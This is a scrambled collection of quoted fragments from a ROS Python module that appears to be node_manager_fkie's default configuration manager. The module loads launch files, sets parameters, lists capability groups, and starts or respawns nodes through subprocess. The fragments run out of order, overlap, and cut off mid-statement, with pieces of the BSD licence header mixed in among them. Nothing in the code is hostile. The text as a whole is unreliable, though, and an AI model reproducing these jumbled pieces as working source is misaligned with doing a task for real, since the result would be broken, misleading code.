"params = dict() for param, value in self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register",
"topics from ROS master master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''): if",
"file to inform the caller about a new configuration. ''' self.description_response = ListDescriptionResponse()",
"= set() self._pending_starts_last_printed = set() def _filter_args(self, argv): afilter = ['__ns:=', '__name:=', '_package:=',",
"#2468 unify clear params to prevent error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p)",
"'nodes': []} except: result[machine_name][ns][p.value] = {'type': '', 'images': [], 'description': '', 'nodes': []}",
"add remaps for remap in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) # masteruri =",
"the description list first for param, p in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value,",
"rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic `%s` is ignored!' % topic) topic =",
"of the node if ns not in result[machine_name]: result[machine_name][ns] = dict() if p.value",
"req): ''' Returns the current description. ''' return self.description_response def loadParams(self): ''' Loads",
"roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import roslib.rosenv return",
"HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT",
"len(p.value) > 0 and len(p.value[0]) != 4: print(\"WRONG format, expected: ['name', 'type', 'images',",
"@param val: the string coding as system default @type val: str @return: the",
"all parameter into ROS parameter server. ''' params = dict() for param, value",
"= self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items(): for",
"masteruri = self.masteruri # if n.machine_name and not n.machine_name == 'localhost': # machine",
"(INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #",
"ROS services # HACK to let the node_manager to update the view if",
"= dict() if p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images':",
"env, node, autostart)) start_timer.start() if start_now and autostart and start_delay > 0: start_now",
"print the current pending autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts",
"'runNode: ', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\", node,",
"autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) > 1: raise",
"masteruri, params, clear_params): \"\"\" Load parameters onto the parameter server \"\"\" try: import",
"processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from pending autostarts try: self._pending_starts.remove(node)",
"self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name not in result: result[machine_name] = dict() for",
"is None or len(cmd) == 0: raise StartException('%s in package [%s] not found!'",
"find the capability group parameter in namespace while cap_param not in self.roscfg.params and",
"a.startswith(f): in_filter = True break if ':=' not in a or in_filter: continue",
"documentation and/or other materials provided # with the distribution. # * Neither the",
"else: for entry in p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if not entry[0] or",
"on ROS distribution API. @return: ROS HOME path @rtype: C{str} ''' try: import",
"node containing in the loaded configuration. ''' pass class DefaultCfg(object): def __init__(self): self.nodes",
"if not entry[0] or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type =",
"os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create the list",
"group if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name not",
"> 0: start_now = False # start timer for delayed start start_timer =",
"return float(self.roscfg.params[param_name].value) except: pass return 0. def _get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher')",
"that the following conditions # are met: # # * Redistributions of source",
"rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\"",
"'ROS_HOME': cwd = self.get_ros_home() elif n.cwd == 'node': cwd = os.path.dirname(cmd[0]) respawn =",
"self.load(2.) return [] # def rosservice_load_launch(self, req): # ''' # Load the launch",
"ScreenHandler # , ScreenHandlerException class LoadException(Exception): ''' The exception throwing while searching for",
"self.do_autostart = False def _decode(self, val): ''' Replaces the '\\\\n' by LF (Line",
"start_delay > 0: start_now = False # start timer for delayed start start_timer",
"is None): if n.cwd == 'ROS_HOME': cwd = self.get_ros_home() elif n.cwd == 'node':",
"OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR",
"(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE",
"# get the robot description self.description_response = dr = ListDescriptionResponse() dr.robot_name = ''",
"a launch file. If package is given, try first to find the launch",
"xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p = None try: # multi-call style",
"'ENV' from environment new_env = dict(os.environ) try: for k in ['BASH_ENV', 'ENV']: del",
"searching for the given launch file. ''' pass class StartException(Exception): ''' The exception",
"result def get_ros_home(self): ''' Returns the ROS HOME path depending on ROS distribution",
"import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params, clear_params): \"\"\" Load parameters",
"Returns the master URI depending on ROS distribution API. @return: ROS master URI",
"# if machine.env_args: # env[len(env):] = machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package, n.type)",
"''' with self.__lock: self._pending_starts.clear() # shutdown the services to inform the caller about",
"contributors may be used to endorse or promote products derived # from this",
"following disclaimer. # * Redistributions in binary form must reproduce the above #",
"except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except:",
"self._pending_starts.clear() # shutdown the services to inform the caller about a new configuration.",
"disclaimer. # * Redistributions in binary form must reproduce the above # copyright",
"def _get_respawn_params(self, node): result = {'max': 0, 'min_runtime': 0, 'delay': 0} respawn_max =",
"n.env_args: new_env[k] = v # the ROS_NAMESPACE environment is used in cpp plugins",
"Callback for the ROS service to get the list with available nodes. '''",
"PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY,",
"about a new configuration. ''' self.listService = None '''@ivar: The service will be",
"# # Redistribution and use in source and binary forms, with or without",
"self._run_node, args=(cmd, cwd, env, node, False)) start_timer.start() if start_now: ps = subprocess.Popen(cmd, cwd=cwd,",
"COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL,",
"sys import threading from .screen_handler import ScreenHandler # , ScreenHandlerException class LoadException(Exception): '''",
"ROS HOME path @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if",
"if not isinstance(self.argv, list): self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart',",
"NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE,",
"form must reproduce the above # copyright notice, this list of conditions and",
"throwing while searching for the given launch file. ''' pass class StartException(Exception): '''",
"= False # get published topics from ROS master master = rosgraph.masterapi.Master(self.masteruri) for",
"the launch file configuration ''' with self.__lock: self._pending_starts.clear() # shutdown the services to",
"and creates dictionary for grouping the nodes. @return: the capabilities description stored in",
"''' return self.description_response def loadParams(self): ''' Loads all parameter into ROS parameter server.",
"None else '' args = ['__ns:=%s' % n.namespace, '__name:=%s' % n.name] if not",
"Returns the ROS HOME path depending on ROS distribution API. @return: ROS HOME",
"not None: # get the capabilities description # use two separate loops, to",
"from .screen_handler import ScreenHandler # , ScreenHandlerException class LoadException(Exception): ''' The exception throwing",
"the master URI depending on ROS distribution API. @return: ROS master URI @rtype:",
"in_filter = False for f in afilter: if a.startswith(f): in_filter = True break",
"import rospkg return rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod",
"BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS IS\" AND ANY EXPRESS OR",
"# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY",
"# self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes: # self.runService = rospy.Service('~run',",
"the services to inform the caller about a new configuration. if self.runService is",
"# use two separate loops, to create the description list first for param,",
"%s: %s\", n, e) self.do_autostart = False def _decode(self, val): ''' Replaces the",
"if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME',",
"e: rospy.logwarn(\"Error while start %s: %s\", n, e) self.do_autostart = False def _decode(self,",
"respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d'",
"to start a node. ''' self.runNode(req.node) return [] def rosservice_reload(self, req): self.load(2.) return",
"with namespace self.sensors = {} # sensor descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading",
"CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #",
"launch file @rtype: C{str} @raise LoadException: if the given file is not found",
"_ in r: # if code != 1: # raise StartException(\"Failed to clear",
"GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)",
"self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes: # self.runService = rospy.Service('~run', Task,",
"topic def _get_respawn_params(self, node): result = {'max': 0, 'min_runtime': 0, 'delay': 0} respawn_max",
"= value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True def",
"disclaimer in the documentation and/or other materials provided # with the distribution. #",
"dr.robot_type = entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except: pass #",
"to inform the caller about a new configuration. if self.runService is not None:",
"cap_ns: cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname: cap_ns",
"self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items(): if machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address",
"SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER #",
"else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes: # self.runService",
"= rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: # import traceback # print traceback.format_exc() if",
"and/or other materials provided # with the distribution. # * Neither the name",
"if package: paths = roslib.packages.find_resource(package, launch_file) if len(paths) > 0: # if more",
"LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT",
"# TODO: env-loader support? # if machine.env_args: # env[len(env):] = machine.env_args # nm.screen().testScreen()",
"find the launch file in the given package. If more then one launch",
"except: pass return result def getCapabilitiesDesrc(self): ''' Parses the launch file for C{capabilities}",
"try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic `%s` is",
"not added: ns = cap_ns # add new group in the namespace of",
"nodes with name spaces.''' self.sensors = {} '''@ivar: Sensor description: C{dict(node name :",
"_timed_service_creation(self): with self.__lock: try: if self.runService is None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node)",
"rosservice_start_node(self, req): ''' Callback for the ROS service to start a node. '''",
"if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]]",
"''' if not self.parameter_loaded: self.loadParams() n = None for item in self.roscfg.nodes: itemname",
"from the currently loaded configuration. @param node: the name of the node @type",
"False # start timer for delayed start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd,",
"def rosservice_description(self, req): ''' Returns the current description. ''' return self.description_response def loadParams(self):",
"C{str} @param package: the package containing the launch file or an empty string,",
"import traceback print(traceback.format_exc()) def getPath(self, path, package=''): ''' Searches for a launch file.",
"try: result = result.decode(sys.getfilesystemencoding()) except: pass return result def getCapabilitiesDesrc(self): ''' Parses the",
"runNode(self, node, autostart=False): ''' Start the node with given name from the currently",
"list with names of nodes with name spaces.''' self.sensors = {} '''@ivar: Sensor",
"creates dictionary for grouping the nodes. @return: the capabilities description stored in this",
"n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):]",
"list): self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) # initialize",
"if an error occurred while start. ''' if not self.parameter_loaded: self.loadParams() n =",
"string_types = types.StringTypes else: string_types = (str,) if isinstance(cmd, string_types): cmd = [cmd]",
"ROS service to get the list with available nodes. ''' return ListNodesResponse(self.nodes) def",
"rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create the list with node names",
"environment is used in cpp plugins in rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace",
"self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: # import traceback # print traceback.format_exc()",
"SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,",
"self.parameter_loaded: self.loadParams() for n in self.nodes: try: self.runNode(n, self.do_autostart) except Exception as e:",
"ListNodes, self.rosservice_list_nodes) # except: # import traceback # print traceback.format_exc() if self.do_autostart: if",
"= self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg =",
"\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED",
"# if the 'capability_group' parameter found, assign node to the group if cap_param",
"rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv', [])",
"if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') # set the respawn environment variables respawn_params",
"if self.do_autostart: if not self.parameter_loaded: self.loadParams() for n in self.nodes: try: self.runNode(n, self.do_autostart)",
"paths = roslib.packages.find_resource(package, launch_file) if len(paths) > 0: # if more then one",
"StartException(\"Failed to clear parameter: %s\"%(msg)) # multi-call objects are not reusable param_server_multi =",
"= roslib.packages.find_resource(package, launch_file) if len(paths) > 0: # if more then one launch",
"HOME path @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro",
"datatype in master.getPublishedTopics(''): if start_required == topic: start_now = True break if not",
"package [%s] not found!' % (filename, pkg)) return cmd def _get_start_exclude(self, node): param_name",
"XmlLoader() argv = self._filter_args(sys.argv) # remove namespace from sys.argv to avoid load the",
"the first one launch_file = paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise",
"try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return",
"except: import traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params,",
"param, p in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value) > 0",
"in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} # get the",
"node with given name from the currently loaded configuration. @param node: the name",
"% respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd = [respawn[0],",
"# get the capabilities description # use two separate loops, to create the",
"start timer for delayed start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node,",
"self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv",
"val: the string coding as system default @type val: str @return: the decoded",
"node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try: topic = self.roscfg.params[param_name].value if",
"['electric', 'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home() except:",
"if self.runService is not None: self.runService.shutdown('reload config') self.runService = None if self.listService is",
"print traceback.format_exc() if self.do_autostart: if not self.parameter_loaded: self.loadParams() for n in self.nodes: try:",
"del new_env[k] except: pass # add node environment parameter for k, v in",
"start_now = False # get published topics from ROS master master = rosgraph.masterapi.Master(self.masteruri)",
"the list with names of nodes with name spaces.''' self.sensors = {} '''@ivar:",
"and the following # disclaimer in the documentation and/or other materials provided #",
"= paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise LoadException('File %s in package",
"not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic def _get_respawn_params(self, node):",
"return result def get_ros_home(self): ''' Returns the ROS HOME path depending on ROS",
"start_timer.start() if start_now and autostart and start_delay > 0: start_now = False #",
"the C{file} is an absolute path @type package: C{str} @return: the absolute path",
"= [] # the name of nodes with namespace self.sensors = {} #",
"if self.listService is None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc())",
"_filter_args(self, argv): afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result = [] for a",
"if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name not in",
"dr.robot_type = '' dr.robot_descr = '' for param, p in self.roscfg.params.items(): if param.endswith('robots'):",
"If more then one launch file with the same name found in the",
"raise StartException(\"Failed to set parameter: %s\" % (msg)) except Exception: raise # re-raise",
"= result.decode(sys.getfilesystemencoding()) except: pass return result def getCapabilitiesDesrc(self): ''' Parses the launch file",
"str or array of string if sys.version_info[0] <= 2: import types string_types =",
"package. If more then one launch file with the same name found in",
"start_timer.start() if start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env) # wait for process to",
"rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except:",
"ns == cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added = True break if",
"raise StartException('Multiple executables are found! The first one was started! Exceutables:\\n%s' % str(cmd))",
"0 and len(p.value[0]) != 4: print(\"WRONG format, expected: ['name', 'type', 'images', 'description'] ->",
"of Fraunhofer nor the names of its # contributors may be used to",
"pending autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts),",
"path: the file name of the launch file @type path: C{str} @param package:",
"clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() # for code, msg, _ in r:",
"for item in self.roscfg.nodes: if item.machine_name and not item.machine_name == 'localhost': machine =",
"in ns_dict.items(): for group, descr_dict in group_dict.items(): if descr_dict['nodes']: cap = Capability() cap.namespace",
"ListDescriptionResponse, ListNodesResponse # , LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from roslaunch import ROSLaunchConfig,",
"= self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic `%s` is ignored!' %",
"to create the description list first for param, p in self.roscfg.params.items(): if param.endswith('capabilities'):",
"# ''' # Load the launch file # ''' # try: # self.__lock.acquire()",
"the following # disclaimer in the documentation and/or other materials provided # with",
"dr.robot_name = '' dr.robot_type = '' dr.robot_descr = '' for param, p in",
"ROSLaunchConfig() loader = XmlLoader() argv = self._filter_args(sys.argv) # remove namespace from sys.argv to",
"self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if itemname == node: n = item break",
"# remove namespace from sys.argv to avoid load the launchfile info local namespace",
"item.machine_name == 'localhost' else '' added = False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns",
"[]} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): ''' Returns the master URI depending on",
"code, msg, _ in r: # if code != 1: # raise StartException(\"Failed",
"if len(paths) > 0: # if more then one launch file is found,",
"path of the launch file @rtype: C{str} @raise LoadException: if the given file",
"import rospy import shlex import std_srvs.srv import subprocess import sys import threading from",
"self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items(): for group,",
"for param, p in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list): if len(p.value) >",
"cwd = self.get_ros_home() elif n.cwd == 'node': cwd = os.path.dirname(cmd[0]) respawn = ['']",
"IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN",
"self._run_node, args=(cmd, cwd, env, node, autostart)) start_timer.start() if start_now and autostart and start_delay",
"try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: return",
"'' args = ['__ns:=%s' % n.namespace, '__name:=%s' % n.name] if not (n.cwd is",
"else: import rospkg return rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home()",
"multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces # #2468",
"= rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes: # self.runService = rospy.Service('~run', Task, self.rosservice_start_node)",
"= self.get_ros_home() if not (n.cwd is None): if n.cwd == 'ROS_HOME': cwd =",
"topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic `%s` is ignored!'",
"return roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import roslib.rosenv",
"not None and not item.machine_name == 'localhost' else '' added = False cap_param",
"in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() # for code, msg, _ in",
"path # if package is set, try to find the launch file in",
"item.name) if itemname == node: n = item break if n is None:",
"%s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename): cmd = None try: cmd =",
"in the loaded configuration. ''' pass class DefaultCfg(object): def __init__(self): self.nodes = []",
"env, node, autostart=False): self._pending_starts.add(node) start_now = True start_delay = self._get_start_delay(node) start_required = self._get_start_required(node)",
"Parses the launch file for C{capabilities} and C{capability_group} parameter and creates dictionary for",
"n.namespace # set delayed autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if",
"break if not added: ns = cap_ns # add new group in the",
"Exception as e: raise StartException(str(e)) # handle different result types str or array",
": str, 'nodes' : [str]))))} ''' result = dict() capabilies_descr = dict() if",
"Load parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package = rospy.get_param('~package',",
"'') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package)",
"CONTRIBUTORS # \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT",
"if item.machine_name is not None and not item.machine_name == 'localhost' else '' added",
"different result types str or array of string if sys.version_info[0] <= 2: import",
"start_required == topic: start_now = True break if not start_now: # Start the",
"dictionary for grouping the nodes. @return: the capabilities description stored in this configuration",
"capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} # get the capability nodes",
"for waiting for the topic start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env, node,",
"in ['BASH_ENV', 'ENV']: del new_env[k] except: pass # add node environment parameter for",
"= None try: # multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified",
"is not None: self.runService.shutdown('reload config') self.runService = None if self.listService is not None:",
"# if code != 1: # raise StartException(\"Failed to clear parameter: %s\"%(msg)) #",
"item.machine_name and not item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name))",
"tupel of (type, name, text) ''' self.package = '' self.file = '' self.__lock",
"= self.masteruri # if n.machine_name and not n.machine_name == 'localhost': # machine =",
"% self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv) if not isinstance(self.argv,",
"% self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start)",
"entry from system default coding to unicode. @param val: the string coding as",
"not machine or roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items(): for group, descr_dict in",
"DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY",
"''' The exception throwing while run a node containing in the loaded configuration.",
"C{capability_group} parameter and creates dictionary for grouping the nodes. @return: the capabilities description",
"k in ['BASH_ENV', 'ENV']: del new_env[k] except: pass # add node environment parameter",
"if not self.parameter_loaded: self.loadParams() for n in self.nodes: try: self.runNode(n, self.do_autostart) except Exception",
"len(cmd) == 0: raise StartException('%s in package [%s] not found!' % (filename, pkg))",
"master URI @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro",
"def rosservice_list_nodes(self, req): ''' Callback for the ROS service to get the list",
"name of the node @type node: C{str} @raise StartException: if an error occurred",
"ROS parameter server. ''' params = dict() for param, value in self.roscfg.params.items(): params[param]",
"<= 2: import types string_types = types.StringTypes else: string_types = (str,) if isinstance(cmd,",
"descr_dict['nodes']: cap = Capability() cap.namespace = ns cap.name = group cap.type = descr_dict['type']",
"''' launch_file = path # if package is set, try to find the",
"STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY",
"= None try: cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e: # multiple",
"k, v in n.env_args: new_env[k] = v # the ROS_NAMESPACE environment is used",
"file @type path: C{str} @param package: the package containing the launch file or",
"args=(cmd, cwd, env, node, False)) start_timer.start() if start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env)",
"not cap_ns: cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname:",
"= val.replace(\"\\\\n \", \"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except: pass return result def",
"# HACK to let the node_manager to update the view if delay_service_creation >",
"n.cwd == 'node': cwd = os.path.dirname(cmd[0]) respawn = [''] if n.respawn: respawn =",
"p.value in groups: groups[p.value]['nodes'].append(node_fullname) added = True break if not added: ns =",
"item.name) machine_name = item.machine_name if item.machine_name is not None and not item.machine_name ==",
"self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) # initialize the",
"1: raise StartException('Multiple executables are found! The first one was started! Exceutables:\\n%s' %",
"the following disclaimer. # * Redistributions in binary form must reproduce the above",
"loaded configuration. ''' pass class DefaultCfg(object): def __init__(self): self.nodes = [] '''@ivar: the",
"(Line Feed) and decode the string entry from system default coding to unicode.",
"result = dict() capabilies_descr = dict() if self.roscfg is not None: # get",
"%s\" % self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start =",
"configuration. ''' self.listService = None '''@ivar: The service will be created on each",
"cmd def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass",
"print(traceback.format_exc()) def getPath(self, path, package=''): ''' Searches for a launch file. If package",
"# * Redistributions in binary form must reproduce the above # copyright notice,",
"the caller about a new configuration. ''' self.listService = None '''@ivar: The service",
"filename): cmd = None try: cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e:",
"self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except: pass",
"len(p.value) > 0 and len(p.value[0]) != 5: print(\"WRONG format, expected: ['host(ROS master Name)',",
"dict() if p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'],",
"node names for item in self.roscfg.nodes: if item.machine_name and not item.machine_name == 'localhost':",
"'''@ivar: Sensor description: C{dict(node name : [(sensor type, sensor name, sensor description), ...])}'''",
"OF THE # POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function from multimaster_msgs_fkie.msg",
"retain the above copyright # notice, this list of conditions and the following",
"found! The first one was started! Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd, cwd,",
"list with available nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback for",
"self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot description self.description_response = dr = ListDescriptionResponse() dr.robot_name",
"namespaces # #2468 unify clear params to prevent error for p in clear_params:",
"@raise LoadException: if the given file is not found ''' launch_file = path",
"ROS distribution API. @return: ROS HOME path @rtype: C{str} ''' try: import rospkg.distro",
